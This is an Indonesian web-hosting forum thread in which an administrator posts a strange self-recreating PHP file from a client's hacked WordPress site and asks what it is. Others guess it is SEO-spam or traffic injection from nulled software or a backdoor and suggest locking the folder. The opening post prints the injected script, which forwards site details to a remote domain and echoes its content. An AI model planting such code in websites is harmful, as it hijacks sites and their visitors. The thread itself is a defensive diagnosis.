ada yang tau script ini ??

Discussion in 'Masalah Teknik dan Keamanan' started by pangeran1995, 10 Jan 2016.

Thread Status:
Not open for further replies.
  1. pangeran1995

    pangeran1995 Hosting Guru

    Messages:
    1,414
    Likes Received:
    117
    Trophy Points:
    63
    saya menemukan sebuah file aneh di website client isinya seperti ini

    <?php
    set_time_limit(0);

    header("Content-Type: text/html;charset=gb2312");
    date_default_timezone_set('PRC');
    $Remote_server = "http://hulunbeier.xigua668.com/";
    $host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
    $Content_mb=file_get_contents($Remote_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

    echo $Content_mb;

    ?>

    =======================
    karena script ini memakan EntryProses 100 dan Ram cukup tinggi 3Gb karena saya limit akun tersebut segitu
    untuk CPU nol tanpa proses akan tetapi bagian bengkak hanya di entryproses dan Ram saja.
    ketika saya hapus filenya dia akan membuat ulang file tersebut. ketika di ubah permission dari 0444 menjadi 0644 akan tetapi sama saja menjadi 0444 kembali setelah di reffress

    mungkin ada yang ngalami??
     
  2. jaapns

    jaapns Hosting Guru Web Hosting

    Messages:
    3,377
    Likes Received:
    474
    Trophy Points:
    83
    di chmod 0000 saja folder nya dari root
     
  3. Mylo Sepz

    Mylo Sepz Apprentice 2.0

    Messages:
    532
    Likes Received:
    59
    Trophy Points:
    28
  4. mas.satriyo

    mas.satriyo Hosting Guru

    Messages:
    1,274
    Likes Received:
    204
    Trophy Points:
    63
  5. Mylo Sepz

    Mylo Sepz Apprentice 2.0

    Messages:
    532
    Likes Received:
    59
    Trophy Points:
    28
    bisa jadi. pengen naikin visitor dengan cepat ya tinggal sisipin php diatas ke web orang. biasanya ya yang nulled-nulled atau dia backdoor terus sisipin deh.
     
  6. junior riau

    junior riau Hosting Guru Web Hosting

    Messages:
    3,427
    Likes Received:
    578
    Trophy Points:
    113
    making own visitor sepertinya visitor generator
     
  7. mas.satriyo

    mas.satriyo Hosting Guru

    Messages:
    1,274
    Likes Received:
    204
    Trophy Points:
    63
    soalnya nulled-er yg rada 'sopan' biasanya cuma nyisip backlink doang :D
    kalo yg rusuh sih sekalian pasang backdoor
    itu bisa re-create otomatis berarti ada 'temennya'
    ada script autogenerate-nya
     
  8. dhyhost

    dhyhost Hosting Guru Web Hosting

    Messages:
    4,718
    Likes Received:
    730
    Trophy Points:
    113
    berari induknya harus dihapus juga...
    atau bisa di chmod aja ke 000 dari rootnya
     
  9. pangeran1995

    pangeran1995 Hosting Guru

    Messages:
    1,414
    Likes Received:
    117
    Trophy Points:
    63
    saya bertanya kepada pelanggan
    dia bilang tidak nulled hanya aja pernah kena injeck di wordpressnya sebelum pindah hosting :D
    dan saya cek ricek ternyata ada script bgtu
     
  10. pangeran1995

    pangeran1995 Hosting Guru

    Messages:
    1,414
    Likes Received:
    117
    Trophy Points:
    63
    saya cari2 temennya gak ketemu.. padahal udah ubek2 semua folder :D
     
Loading...
Thread Status:
Not open for further replies.

Share This Page

Loading...